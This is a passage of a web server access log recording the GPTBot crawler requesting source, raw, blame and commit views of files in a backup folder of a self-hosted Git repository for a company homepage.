[Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/README.md" -[17/Feb/2026:14:30:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 10862] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.tsx" -[17/Feb/2026:14:30:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/README.md" [Client 74.7.227.38] [Length 10982] [Gzip 3.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/README.md" -[17/Feb/2026:14:30:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/types.ts" [Client 74.7.227.38] [Length 10807] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/types.ts" -[17/Feb/2026:14:30:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components" [Client 74.7.227.38] [Length 10616] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html" -[17/Feb/2026:14:30:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/update_status.py" [Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/update_status.py" -[17/Feb/2026:14:30:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets" [Client 74.7.227.38] [Length 9868] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets" -[17/Feb/2026:14:30:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 10760] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/.gitignore" -[17/Feb/2026:14:30:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/.gitignore" -[17/Feb/2026:14:30:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 12788] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html" -[17/Feb/2026:14:30:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/services" [Client 74.7.227.38] [Length 9883] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/services" -[17/Feb/2026:14:30:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/types.ts" [Client 74.7.227.38] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/types.ts" -[17/Feb/2026:14:30:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/.gitignore" -[17/Feb/2026:14:30:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/README.md" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/README.md" -[17/Feb/2026:14:30:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/status.json" [Client 74.7.227.38] [Length 11077] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html" -[17/Feb/2026:14:30:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13903] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components" -[17/Feb/2026:14:30:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components" [Client 74.7.227.38] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components" -[17/Feb/2026:14:30:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 11303] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html" -[17/Feb/2026:14:30:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 11886] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html" -[17/Feb/2026:14:30:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13176] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/services" -[17/Feb/2026:14:30:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 12484] [Gzip 5.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/App.tsx" -[17/Feb/2026:14:30:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/App.tsx" -[17/Feb/2026:14:30:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/App.tsx" -[17/Feb/2026:14:30:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/update_status.py" [Client 74.7.227.38] [Length 12530] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/update_status.py" -[17/Feb/2026:14:30:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.html" [Client 74.7.227.38] [Length 21809] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html" -[17/Feb/2026:14:30:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/status.json" -[17/Feb/2026:14:30:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Hero.tsx" -[17/Feb/2026:14:30:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/status.json" [Client 74.7.227.38] [Length 10024] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/status.json" -[17/Feb/2026:14:30:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 10383] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/metadata.json" -[17/Feb/2026:14:30:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/tsconfig.json" -[17/Feb/2026:14:30:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 11213] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/tsconfig.json" -[17/Feb/2026:14:30:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/metadata.json" -[17/Feb/2026:14:30:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/services/geminiService.ts" -[17/Feb/2026:14:30:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 12974] [Gzip 4.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/services/geminiService.ts" -[17/Feb/2026:14:30:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 625] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/docker-compose.yml" -[17/Feb/2026:14:30:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.html" [Client 74.7.227.38] [Length 9869] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.html" -[17/Feb/2026:14:30:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.html" [Client 74.7.227.38] [Length 17807] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.html" -[17/Feb/2026:14:30:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 11157] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/docker-compose.yml" -[17/Feb/2026:14:30:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.html" [Client 74.7.227.38] [Length 23745] [Gzip 11.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.html" -[17/Feb/2026:14:30:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/package.json" [Client 74.7.227.38] [Length 11704] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html" -[17/Feb/2026:14:30:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 14847] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components" -[17/Feb/2026:14:30:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13684] [Gzip 5.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Hero.tsx" -[17/Feb/2026:14:30:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 13960] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components" -[17/Feb/2026:14:30:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15582] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components" -[17/Feb/2026:14:30:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14238] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components" -[17/Feb/2026:14:31:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16508] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components" -[17/Feb/2026:14:31:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/update_status.py" [Client 74.7.227.38] [Length 9889] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/update_status.py" -[17/Feb/2026:14:31:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/docker-compose.yml" -[17/Feb/2026:14:31:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images" [Client 74.7.227.38] [Length 10207] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets" -[17/Feb/2026:14:31:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14693] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components" -[17/Feb/2026:14:31:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/package.json" -[17/Feb/2026:14:31:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Header.tsx" -[17/Feb/2026:14:31:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/package.json" [Client 74.7.227.38] [Length 10982] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/package.json" -[17/Feb/2026:14:31:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/About.tsx" -[17/Feb/2026:14:31:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:14:31:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 